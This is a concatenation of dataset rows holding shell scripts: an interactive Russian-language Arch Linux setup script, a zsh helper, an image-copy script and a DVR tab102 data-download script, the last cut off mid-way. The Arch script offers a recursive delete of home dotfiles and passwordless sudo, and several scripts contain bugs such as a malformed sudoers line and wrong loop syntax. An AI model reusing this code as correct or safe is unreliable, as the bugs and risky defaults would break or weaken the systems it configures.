get kubedirectorcluster -n \$TENANT_NS $MLFLOW_CLUSTER_NAME -o 'jsonpath={.status.state}')
echo STATE=\$STATE
[[ \$STATE == "configured" ]] && break
sleep 1m
let COUNTER=COUNTER+1
done
if [[ \$STATE != "configured" ]];
then
echo "State is not configured after 30 minutes. Raising an error."
exit 1
fi
EOF1
| true
|
719042ad51551471d66eabe1edbe0764b2a9785a
|
Shell
|
ordanax/archlinux-kde--script-install-uefi-nogrub-and-grub-install
|
/kde.sh
|
UTF-8
| 31,384
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
echo 'скрипт второй настройка системы в chroot '
timedatectl set-ntp true
pacman -Syyu --noconfirm
read -p "Введите имя компьютера: " hostname
read -p "Введите имя пользователя: " username
echo 'Прописываем имя компьютера'
echo $hostname > /etc/hostname
echo ""
echo " Очистим папку конфигов, кеш, и скрытые каталоги в /home/$username от старой системы ? "
while
read -n1 -p "
1 - да
0 - нет: " i_rm # sends right after the keypress
echo ''
[[ "$i_rm" =~ [^10] ]]
do
:
done
if [[ $i_rm == 0 ]]; then
clear
echo " очистка пропущена "
elif [[ $i_rm == 1 ]]; then
rm -rf /home/$username/.*
clear
echo " очистка завершена "
fi
#####################################
echo " Настроим localtime "
while
read -n1 -p "
1 - Москва
2 - Минск
3 - Екатеринбург
4 - Киев
5 - Якутск
6 - Саратов
7- Новосибирск
0 - пропустить(если нет вашего варианта) : " wm_time
echo ''
[[ "$wm_time" =~ [^12345670] ]]
do
:
done
if [[ $wm_time == 1 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Moscow /etc/localtime
echo " Москва "
elif [[ $wm_time == 2 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Minsk /etc/localtime
echo "Минск"
elif [[ $wm_time == 3 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime
echo " Екатеринбург "
elif [[ $wm_time == 4 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Kiev /etc/localtime
echo " Киев "
elif [[ $wm_time == 5 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Yakutsk /etc/localtime
echo " Якутск "
elif [[ $wm_time == 6 ]]; then
ln -sf /usr/share/zoneinfo/Europe/Saratov /etc/localtime
echo " Саратов "
elif [[ $wm_time == 7 ]]; then
ln -sf /usr/share/zoneinfo/Asia/Novosibirsk /etc/localtime
echo " Новосибирск "
elif [[ $wm_time == 0 ]]; then
clear
echo " этап пропущен "
fi
#####################################
echo "en_US.UTF-8 UTF-8" > /etc/locale.gen
echo "ru_RU.UTF-8 UTF-8" >> /etc/locale.gen
locale-gen
echo 'LANG="ru_RU.UTF-8"' > /etc/locale.conf
echo "KEYMAP=ru" >> /etc/vconsole.conf
echo "FONT=cyr-sun16" >> /etc/vconsole.conf
echo " Укажите пароль для "ROOT" "
passwd
echo 'Добавляем пароль для пользователя '$username' '
useradd -m -g users -G wheel -s /bin/bash $username
passwd $username
echo ""
echo " Я рекомендую не изменять зеркала во время установки, для уменьшения вероятности ошибок "
echo " Если не уверены в том что смена зеркал вамм необходима, тогда пропустите "
echo ""
echo 'Сменим зеркала на Россия\Беларусь для увеличения скорости загрузки пакетов?'
while
read -n1 -p "
1 - да
0 - нет: " zerkala # sends right after the keypress
echo ''
[[ "$zerkala" =~ [^10] ]]
do
:
done
if [[ $zerkala == 1 ]]; then
wget https://raw.githubusercontent.com/poruncov/archlinux-kde--script-install-uefi-nogrub-and-grub-install/master/zer
cat 'zer' > /etc/pacman.d/mirrorlist
rm zer
elif [[ $zerkala == 0 ]]; then
echo 'смена зеркал пропущена.'
fi
pacman -Syy
clear
lsblk -f
###########################################################################
echo ""
echo "Какой загрузчик установить UEFI(systemd) или Grub для legacy"
while
read -n1 -p "
1 - UEFI
2 - GRUB(legacy): " t_bootloader # sends right after the keypress
echo ''
[[ "$t_bootloader" =~ [^12] ]]
do
:
done
if [[ $t_bootloader == 1 ]]; then
bootctl install
echo ' default arch ' > /boot/loader/loader.conf
echo ' timeout 10 ' >> /boot/loader/loader.conf
echo ' editor 0' >> /boot/loader/loader.conf
echo ""
echo " Укажите тот радел который будет после перезагрузки, то есть например "
echo " при установке с флешки ваш hdd может быть sdb, а после перезагрузки sda "
echo " выше видно что sdbX напривмер примонтирован в /mnt, а после перезагрузки systemd будет искать корень на sdaX "
echo " если указать не правильный раздел система не загрузится "
echo " если у вас один hdd/ssd тогда это будет sda 99%"
echo ""
read -p "Укажите ROOT раздел для загрузчика(пример sda6,sdb3 ): " root
echo 'title Arch Linux' > /boot/loader/entries/arch.conf
echo 'linux /vmlinuz-linux' >> /boot/loader/entries/arch.conf
echo 'initrd /initramfs-linux.img' >> /boot/loader/entries/arch.conf
echo options root=/dev/$root rw >> /boot/loader/entries/arch.conf
cd /home/$username
git clone https://aur.archlinux.org/systemd-boot-pacman-hook.git
chown -R $username:users /home/$username/systemd-boot-pacman-hook
chown -R $username:users /home/$username/systemd-boot-pacman-hook/PKGBUILD
cd /home/$username/systemd-boot-pacman-hook
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/systemd-boot-pacman-hook
cd /home/$username
clear
elif [[ $t_bootloader == 2 ]]; then
pacman -S grub grub-customizer os-prober
read -p "Укажите диск куда установить GRUB (sda/sdb): " x_boot
grub-install /dev/$x_boot
grub-mkconfig -o /boot/grub/grub.cfg
fi
mkinitcpio -p linux
##########
echo ""
echo " Настроим Sudo? "
while
read -n1 -p "
1 - с паролем
2 - без пароля
0 - Sudo не добавляем : " i_sudo # sends right after the keypress
echo ''
[[ "$i_sudo" =~ [^120] ]]
do
:
done
if [[ $i_sudo == 0 ]]; then
clear
echo " Добавление sudo пропущено"
elif [[ $i_sudo == 1 ]]; then
echo '%%wheel ALL=(ALL) ALL' >> /etc/sudoers
clear
echo " Sudo с запросом пароля установлено "
elif [[ $i_sudo == 2 ]]; then
echo '%wheel ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
clear
echo " Sudo nopassword добавлено "
fi
##########
echo ""
echo " Настроим multilib? "
while
read -n1 -p "
1 - да
0 - нет : " i_multilib # sends right after the keypress
echo ''
[[ "$i_multilib" =~ [^10] ]]
do
:
done
if [[ $i_multilib == 0 ]]; then
clear
echo " Добавление мультилиб репозитория пропущено"
elif [[ $i_multilib == 1 ]]; then
echo '[multilib]' >> /etc/pacman.conf
echo 'Include = /etc/pacman.d/mirrorlist' >> /etc/pacman.conf
clear
echo " Multilib репозиторий добавлен"
fi
#######################
pacman -Syy
pacman -Sy xorg-server xorg-drivers --noconfirm
pacman -Sy linux-headers networkmanager network-manager-applet ppp --noconfirm
pacman -Sy pulseaudio-bluetooth ark exfat-utils alsa-utils unzip ntfs-3g pulseaudio-equalizer-ladspa unrar lha --noconfirm
echo "#####################################################################"
echo ""
echo " Arch-wiki рекоендует для kde-sddm, а для xfce-lxdm "
echo ""
echo " Установим DE? "
while
read -n1 -p "
1 - KDE(Plasma)+sddm
2 - xfce+lxdm
3 - kde+lxdm
4 - xfce+sddm
0 - пропустить " x_de
echo ''
[[ "$x_de" =~ [^12340] ]]
do
:
done
if [[ $x_de == 0 ]]; then
echo 'уcтановка DE пропущена'
elif [[ $x_de == 1 ]]; then
pacman -S sddm sddm-kcm plasma-meta kdebase kwalletmanager latte-dock --noconfirm
pacman -R konqueror --noconfirm
systemctl enable sddm.service -f
clear
echo "Plasma KDE успешно установлена"
elif [[ $x_de == 2 ]]; then
pacman -S xfce4 xfce4-goodies lxdm --noconfirm
systemctl enable lxdm
clear
echo "Xfce успешно установлено"
elif [[ $x_de == 3 ]]; then
pacman -S plasma-meta kdebase kwalletmanager latte-dock lxdm --noconfirm
pacman -R konqueror --noconfirm
systemctl enable lxdm
clear
echo "Plasma KDE успешно установлена"
elif [[ $x_de == 4 ]]; then
pacman -S xfce4 xfce4-goodies sddm sddm-kcm --noconfirm
systemctl enable sddm.service -f
clear
echo "Xfce успешно установлено"
fi
echo "#####################################################################"
echo ""
echo " Установка дополнительных программ "
echo ""
echo "
flameshot
filezilla
htop
gparted
neofetch
screenfetch
gwenview
steam steam-native-runtime
spectacle vlc telegram-desktop "
echo ""
echo " установим все или на ваш выбор? "
while
read -n1 -p "
1 - все
2 - на выбор
0 - пропустить " i_prog # sends right after the keypress
echo ''
[[ "$i_prog" =~ [^120] ]]
do
:
done
if [[ $i_prog == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_prog == 1 ]]; then
pacman -S flameshot filezilla htop gparted neofetch screenfetch gwenview steam steam-native-runtime spectacle vlc gvfs-mtp gvfs-afc telegram-desktop --noconfirm
clear
echo " установка завершена "
elif [[ $i_prog == 2 ]]; then
echo "#############################################################################"
echo ""
echo " Будете ли вы подключать Android или Iphone к ПК через USB? "
while
read -n1 -p "
1 - Android
2 - Iphone
3 - оба варианта
0 - пропустить: " i_telephone # sends right after the keypress
echo ''
[[ "$i_telephone" =~ [^1230] ]]
do
:
done
if [[ $i_telephone == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_telephone == 1 ]]; then
pacman -S gvfs-mtp --noconfirm
clear
echo " установка gvfs-mtp завершена "
elif [[ $i_telephone == 2 ]]; then
pacman -S gvfs-afc --noconfirm
clear
echo " установка gvfs-afc завершена "
elif [[ $i_telephone == 3 ]]; then
pacman -S gvfs-afc gvfs-mtp --noconfirm
clear
echo " установка gvfs-afc gvfs-mtp завершена "
fi
echo "#############################################################################"
echo ""
echo " htop--диспетер задач для linux "
while
read -n1 -p "
1 - да
0 - нет: " i_htop # sends right after the keypress
echo ''
[[ "$i_htop" =~ [^10] ]]
do
:
done
if [[ $i_htop == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_htop == 1 ]]; then
pacman -S htop --noconfirm
clear
echo " установка htop завершена "
fi
############# filezilla ###############
echo "#############################################################################"
echo ""
echo " Filezilla - графический клиент для работы с FTP/SFTP "
while
read -n1 -p "
1 - да
0 - нет: " i_filezilla # sends right after the keypress
echo ''
[[ "$i_filezilla" =~ [^10] ]]
do
:
done
if [[ $i_filezilla == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_filezilla == 1 ]]; then
pacman -S filezilla --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " gwenview - программа для просмотра изображений "
while
read -n1 -p "
1 - да
0 - нет: " i_gwenview # sends right after the keypress
echo ''
[[ "$i_gwenview" =~ [^10] ]]
do
:
done
if [[ $i_gwenview == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_gwenview == 1 ]]; then
pacman -S gwenview --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " Steam - магазин игр "
while
read -n1 -p "
1 - да
0 - нет: " i_steam # sends right after the keypress
echo ''
[[ "$i_steam" =~ [^10] ]]
do
:
done
if [[ $i_steam == 0 ]]; then
clear
echo " Усттанока пропущена "
elif [[ $i_steam == 1 ]]; then
pacman -S steam steam-native-runtime --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " neofetch - вывод данных о системе с лого в консоли "
while
read -n1 -p "
1 - да
0 - нет: " i_neofetch # sends right after the keypress
echo ''
[[ "$i_neofetch" =~ [^10] ]]
do
:
done
if [[ $i_neofetch == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_neofetch == 1 ]]; then
pacman -S neofetch --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " screenfetch - вывод данных о системе с лого в консоли( аналог neofetch ) "
while
read -n1 -p "
1 - да
0 - нет: " i_screenfetch # sends right after the keypress
echo ''
[[ "$i_screenfetch" =~ [^10] ]]
do
:
done
if [[ $i_screenfetch == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_screenfetch == 1 ]]; then
pacman -S screenfetch --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " vlc - проигрыватель мультимедиа ) "
while
read -n1 -p "
1 - да
0 - нет: " i_vlc # sends right after the keypress
echo ''
[[ "$i_vlc" =~ [^10] ]]
do
:
done
if [[ $i_vlc == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_vlc == 1 ]]; then
pacman -S vlc --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " gparted - программа для работы с разделоми sdd/hdd ) "
while
read -n1 -p "
1 - да
0 - нет: " i_gparted # sends right after the keypress
echo ''
[[ "$i_gparted" =~ [^10] ]]
do
:
done
if [[ $i_gparted == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_gparted == 1 ]]; then
pacman -S gparted --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " telegram - мессенджер ) "
while
read -n1 -p "
1 - да
0 - нет: " i_telegram # sends right after the keypress
echo ''
[[ "$i_telegram" =~ [^10] ]]
do
:
done
if [[ $i_telegram == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_telegram == 1 ]]; then
pacman -S telegram-desktop --noconfirm
clear
echo " Установка завершена "
fi
echo "#############################################################################"
echo ""
echo " установим программу для создания скриншотов? "
echo ""
echo " spectacle(интегрируеться в рабочий стол Plasma(kde)) и flameshot(универсальна, хорошо работает в KDE и Xfce) "
while
read -n1 -p "
1 - spectacle
2 -flameshot
3 - оба варианта
0 - пропустить: " i_screen # sends right after the keypress
echo ''
[[ "$i_screen" =~ [^1230] ]]
do
:
done
if [[ $i_screen == 0 ]]; then
clear
echo " Устанока пропущена "
elif [[ $i_screen == 1 ]]; then
pacman -S spectacle --noconfirm
clear
echo " Установка завершена "
elif [[ $i_screen == 2 ]]; then
pacman -S flameshot --noconfirm
clear
echo " Установка завершена "
elif [[ $i_screen == 3 ]]; then
pacman -S spectacle flameshot --noconfirm
clear
echo " установка завершена "
fi
fi
###############################################################################
pacman -S ttf-arphic-ukai git ttf-liberation ttf-dejavu ttf-arphic-uming ttf-fireflysung ttf-sazanami --noconfirm
clear
echo ""
echo " Уставливаем ssh(клиент) для удаленного доступа ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_ssh # sends right after the keypress
echo ''
[[ "$t_ssh" =~ [^10] ]]
do
:
done
if [[ $t_ssh == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_ssh == 1 ]]; then
pacman -S openssh --noconfirm
clear
fi
echo ""
echo " Вкличим в автозагрузку ssh(server) для удаленного доступа к этому пк ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_ssh1 # sends right after the keypress
echo ''
[[ "$t_ssh1" =~ [^10] ]]
do
:
done
if [[ $t_ssh1 == 0 ]]; then
clear
echo ' сервис sshd не вкючен'
elif [[ $t_ssh1 == 1 ]]; then
systemctl enable sshd.service
clear
fi
echo "#############################################################################"
echo "###### ZSH #####"
echo ""
echo " установим zsh(такой же как и в установочном образе Archlinux) или оставим Bash по умолчанию ? "
echo ""
echo "при необходимости можно будет установить другую оболочку в уже установленной системе "
while
read -n1 -p "
1 - установить zsh
2 - оставим bash по умолчанию " x_shell
echo ''
[[ "$x_shell" =~ [^12] ]]
do
:
done
if [[ $x_shell == 0 ]]; then
clear
echo ' оболочка не изменета, по умолчанию bash!" '
elif [[ $x_shell == 1 ]]; then
clear
pacman -S zsh zsh-syntax-highlighting grml-zsh-config --noconfirm
echo 'source /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh' >> /etc/zsh/zshrc
echo 'prompt adam2' >> /etc/zsh/zshrc
echo " сменим оболочку пользователя с bash на zsh? "
while
read -n1 -p "
1 - да
0 - нет: " t_shell # sends right after the keypress
echo ''
[[ "$t_shell" =~ [^10] ]]
do
:
done
if [[ $t_shell == 0 ]]; then
clear
echo 'пользоватльская обочка не изменена ( по умолчанию BASH )'
elif [[ $t_shell == 1 ]]; then
chsh -s /bin/zsh
chsh -s /bin/zsh $username
clear
echo " при первом запуске консоли(терминала) нажмите "0" "
echo " оболочка изменена с bash на zsh "
fi
fi
echo "#############################################################################"
systemctl enable NetworkManager.service
systemctl enable bluetooth.service
echo ""
echo " Добавим dhcpcd в автозагрузку( для проводного интернета, который получает настройки от роутера ) ? "
echo ""
echo "при необходиости это можно будет сделать уже в установленной системе "
while
read -n1 -p "
1 - включить dhcpcd
0 - не включать dhcpcd " x_dhcpcd
echo ''
[[ "$x_dhcpcd" =~ [^10] ]]
do
:
done
if [[ $x_dhcpcd == 0 ]]; then
echo ' dhcpcd не включен в автозагрузку, при необходиости это можно будет сделать уже в установленной системе '
elif [[ $x_dhcpcd == 1 ]]; then
systemctl enable dhcpcd.service
clear
echo "Dhcpcd успешно добавлен в автозагрузку"
fi
pacman -Sy --noconfirm
##############################################
echo ""
echo ""
echo "##################################################################################"
echo "################### <<<< установка программ из AUR >>> ######################"
echo "##################################################################################"
echo ""
echo " каждую из программ можно будет пропустить! "
echo ""
###########################################################################
echo " Уставливаем aur-helper ( pikaur(идет как зависимость для octopi) или yay ) ? "
while
read -n1 -p "
1 - pikaur
2 - yay
0 - пропустить : " in_aur_help # sends right after the keypress
echo ''
[[ "$in_aur_help" =~ [^120] ]]
do
:
done
if [[ $in_aur_help == 0 ]]; then
echo ' установка пропущена'
elif [[ $in_aur_help == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pikaur.git
chown -R $username:users /home/$username/pikaur
chown -R $username:users /home/$username/pikaur/PKGBUILD
cd /home/$username/pikaur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pikaur
elif [[ $in_aur_help == 2 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/yay.git
chown -R $username:users /home/$username/yay
chown -R $username:users /home/$username/yay/PKGBUILD
cd /home/$username/yay
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/yay
clear
fi
echo "################################################################"
echo ""
echo " Устанавливаем браузер? : "
while
read -n1 -p "
1 - google-chrome
2 - firefox(russian)
3 - установить оба
0 - пропустить: " g_chrome # sends right after the keypress
echo ''
[[ "$g_chrome" =~ [^1230] ]]
do
:
done
if [[ $g_chrome == 0 ]]; then
echo ' установка браузера пропущена после установки системы вы сможете установить браузер на свой усмотрение!!!!'
elif [[ $g_chrome == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/google-chrome.git
chown -R $username:users /home/$username/google-chrome
chown -R $username:users /home/$username/google-chrome/PKGBUILD
cd /home/$username/google-chrome
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/google-chrome
clear
elif [[ $g_chrome == 2 ]]; then
pacman -S firefox firefox-developer-edition-i18n-ru --noconfirm
clear
elif [[ $g_chrome == 3 ]]; then
pacman -S firefox firefox-developer-edition-i18n-ru --noconfirm
cd /home/$username
git clone https://aur.archlinux.org/google-chrome.git
chown -R $username:users /home/$username/google-chrome
chown -R $username:users /home/$username/google-chrome/PKGBUILD
cd /home/$username/google-chrome
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/google-chrome
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем teamviewer для удаленного доступа ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_teamviewer # sends right after the keypress
echo ''
[[ "$t_teamviewer" =~ [^10] ]]
do
:
done
if [[ $t_teamviewer == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_teamviewer == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/teamviewer.git
chown -R $username:users /home/$username/teamviewer
chown -R $username:users /home/$username/teamviewer/PKGBUILD
cd /home/$username/teamviewer
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/teamviewer
systemctl enable teamviewerd.service
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем vk-messenger ? : "
while
read -n1 -p "
1 - да,
0 - нет: " t_vk # sends right after the keypress
echo ''
[[ "$t_vk" =~ [^10] ]]
do
:
done
if [[ $t_vk == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_vk == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/vk-messenger.git
chown -R $username:users /home/$username/vk-messenger
chown -R $username:users /home/$username/vk-messenger/PKGBUILD
cd /home/$username/vk-messenger
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/vk-messenger
clear
fi
echo "################################################################"
########
echo " Уставливаем woeusb (Программа для записи Windows.iso на USB-накопитель) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_woeusb # sends right after the keypress
echo ''
[[ "$t_woeusb" =~ [^10] ]]
do
:
done
if [[ $t_woeusb == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_woeusb == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/woeusb.git
chown -R $username:users /home/$username/woeusb
chown -R $username:users /home/$username/woeusb/PKGBUILD
cd /home/$username/woeusb
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/woeusb
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем alsi (альтернатива neofetch и screenfetch) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_alsi # sends right after the keypress
echo ''
[[ "$t_alsi" =~ [^10] ]]
do
:
done
if [[ $t_alsi == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_alsi == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/alsi.git
chown -R $username:users /home/$username/alsi
chown -R $username:users /home/$username/alsi/PKGBUILD
cd /home/$username/alsi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alsi
clear
fi
echo "################################################################"
echo ""
echo " Устанавливаем inxi ( подробная информация о системе ) ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_inxi # sends right after the keypress
echo ''
[[ "$t_inxi" =~ [^10] ]]
do
:
done
if [[ $t_inxi == 0 ]]; then
clear
echo 'уcтановка пропущена'
elif [[ $t_inxi == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/inxi.git
chown -R $username:users /home/$username/inxi
chown -R $username:users /home/$username/inxi/PKGBUILD
cd /home/$username/inxi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/inxi
clear
fi
echo "################################################################"
echo ""
echo " Уставливаем графический менеджер пакетов для Archlinux ? : "
while
read -n1 -p "
1 - octopi
2 - pamac-aur
0 - пропустить : " t_aur # sends right after the keypress
echo ''
[[ "$t_aur" =~ [^120] ]]
do
:
done
if [[ $t_aur == 0 ]]; then
echo 'уcтановка пропущена'
elif [[ $t_aur == 1 ]]; then
echo " Был ли выбран ранее pikaur ? : "
while
read -n1 -p "
1 - да
0 - нет: " t_picaur # sends right after the keypress
echo ''
[[ "$t_picaur" =~ [^10] ]]
do
:
done
if [[ $t_picaur == 0 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pikaur.git
chown -R $username:users /home/$username/pikaur
chown -R $username:users /home/$username/pikaur/PKGBUILD
cd /home/$username/pikaur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pikaur
#####
cd /home/$username
git clone https://aur.archlinux.org/alpm_octopi_utils.git
chown -R $username:users /home/$username/alpm_octopi_utils
chown -R $username:users /home/$username/alpm_octopi_utils/PKGBUILD
cd /home/$username/alpm_octopi_utils
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alpm_octopi_utils
################
cd /home/$username
git clone https://aur.archlinux.org/octopi.git
chown -R $username:users /home/$username/octopi
chown -R $username:users /home/$username/octopi/PKGBUILD
cd /home/$username/octopi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/octopi
clear
echo " Octopi успешно установлен "
elif [[ $t_picaur == 1 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/alpm_octopi_utils.git
chown -R $username:users /home/$username/alpm_octopi_utils
chown -R $username:users /home/$username/alpm_octopi_utils/PKGBUILD
cd /home/$username/alpm_octopi_utils
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/alpm_octopi_utils
################
cd /home/$username
git clone https://aur.archlinux.org/octopi.git
chown -R $username:users /home/$username/octopi
chown -R $username:users /home/$username/octopi/PKGBUILD
cd /home/$username/octopi
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/octopi
clear
echo " Octopi успешно установлен "
fi
elif [[ $t_aur == 2 ]]; then
cd /home/$username
git clone https://aur.archlinux.org/pamac-aur.git
chown -R $username:users /home/$username/pamac-aur
chown -R $username:users /home/$username/pamac-aur/PKGBUILD
cd /home/$username/pamac-aur
sudo -u $username makepkg -si --noconfirm
rm -Rf /home/$username/pamac-aur
clear
echo " Pamac-aur успешно установлен! "
fi
echo "#################### Установка пакетов завершена ############################################"
echo ""
echo "
Данный этап поможет исключить возможные ошибки при первом запуске системы
Фаил откроется через редактор !nano!"
echo ""
echo " Просмотрим//отредактируем /etc/fstab ?"
while
read -n1 -p "1 - да, 0 - нет: " vm_fstab # sends right after the keypress
echo ''
[[ "$vm_fstab" =~ [^10] ]]
do
:
done
if [[ $vm_fstab == 0 ]]; then
echo 'этап пропущен'
elif [[ $vm_fstab == 1 ]]; then
nano /etc/fstab
fi
clear
echo "################################################################"
echo ""
echo "Создаем папки музыка, видео и т.д. в дириктории пользователя?"
while
read -n1 -p "1 - да, 0 - нет: " vm_text # sends right after the keypress
echo ''
[[ "$vm_text" =~ [^10] ]]
do
:
done
if [[ $vm_text == 0 ]]; then
echo 'этап пропущен'
elif [[ $vm_text == 1 ]]; then
mkdir /home/$username/{Downloads,Music,Pictures,Videos,Documents,time}
chown -R $username:users /home/$username/{Downloads,Music,Pictures,Videos,Documents,time}
fi
echo "################################################################"
echo "################### T H E E N D ######################"
echo "################################################################"
exit
| true
|
013e48f07b735e1c7c3c0621d0559a0e823f26d3
|
Shell
|
crazy-matt/antigen
|
/src/helpers/interactive-mode.zsh
|
UTF-8
| 524
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
# This function check ZSH_EVAL_CONTEXT to determine if running in interactive shell.
#
# Usage
# -antigen-interactive-mode
#
# Returns
# Either true or false depending if we are running in interactive mode
-antigen-interactive-mode () {
WARN "-antigen-interactive-mode: $ZSH_EVAL_CONTEXT \$_ANTIGEN_INTERACTIVE = $_ANTIGEN_INTERACTIVE"
if [[ $_ANTIGEN_INTERACTIVE != "" ]]; then
[[ $_ANTIGEN_INTERACTIVE == true ]];
return
fi
[[ "$ZSH_EVAL_CONTEXT" == toplevel* || "$ZSH_EVAL_CONTEXT" == cmdarg* ]];
}
| true
|
0ebee4534cfa83ff7e285ef59da751abe2df1da4
|
Shell
|
bkrauzova/scripts
|
/copy_im.sh
|
UTF-8
| 737
| 4.125
| 4
|
[] |
no_license
|
#!/bin/sh
set -e -x
###################################################
# copy images from several subfolder to one folder
###################################################
usage ()
{
echo "use:"
echo "./copy_im <src> <dest>"
echo ""
exit 1
}
if [ -z $2 ]; then
usage
fi
SRC=`pwd`/$1
DES=`pwd`/$2
if [ ! -d $DES -o ! -d $SRC ]; then
echo "destination does not exist"
exit 1;
fi
for ext in jpg, JPG, jpeg, JPEG
do
echo $ext
for i in `find $SRC -name "*.${ext}"`
do
cp -n $SRC/$i $DES;
echo "copying $SRC/$i to $DES ...\n"
done
done
if [ -d $DES ]; then
NUM=`ls $DEST | wc -l`
echo "----------------------------------------------"
echo "$NUM files copied\n"
fi
exit 0
| true
|
d6301faf0adb1860731b8341a185cd0095692951
|
Shell
|
dennis-tmeinc/dvr
|
/dvr602/deploy/MDVR5100/host/dvr/tab102.sh
|
UTF-8
| 4,292
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
PATH=/bin:/davinci:/davinci/dvr
export PATH
remove_usbdrivers()
{
[ -f /var/dvr/udhcpc.pid ] && kill `cat /var/dvr/udhcpc.pid`
ifconfig rausb0 down
/bin/rmmod rt73
/bin/rmmod mos7840
/bin/rmmod usbserial
}
# let tab102(live) finish its job
if [ -f /var/dvr/tab102live -a -f /var/dvr/tab102.pid ]; then
echo 1 > /var/dvr/tab102check
# wait until the tab102 download is done
while [ -f /var/dvr/tab102check ]
do
sleep 1
done
# copy tab102 files
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
fi
# do this only if tab102 was detected (on 510x)
if [ -f /var/dvr/tab102 ]
then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# insert module in case it was removed by file retrieval stick
insmod /davinci/usbserial.ko
/bin/insmod /davinci/mos7840.ko
# unmount every disk already mounted
for f in /var/dvr/xdisk/*
do
umount `cat $f`
rm -f $f ;
done
# download tab102 data
/davinci/dvr/tab102
# we don't need usb/uart anymore
/bin/rmmod mos7840
/bin/rmmod usbserial
# mount disks again
/davinci/dvr/tdevmount /davinci/dvr/tdevhotplug
if [ -f /var/dvr/dvrcurdisk ]; then
# copy tab102 files
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
# Hybrid disk?
if [ -f /var/dvr/backupdisk -a -f /var/dvr/dvrsvr.pid ]; then
# ask dvrsvr to copy files for Hybrid disk
echo 1 > /var/dvr/hybridcopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/hybridcopy -a -f /var/dvr/copyack ]
do
sleep 1
done
# Multiple disk?
elif [ -f /var/dvr/multidisk -a -f /var/dvr/dvrsvr.pid ]; then
# ask dvrsvr to copy log files
echo 1 > /var/dvr/multicopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/multicopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
elif [ -f /var/dvr/backupdisk -a -f /var/dvr/dvrsvr.pid ]; then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# copy files for Hybrid disk (Flash --> Sata)
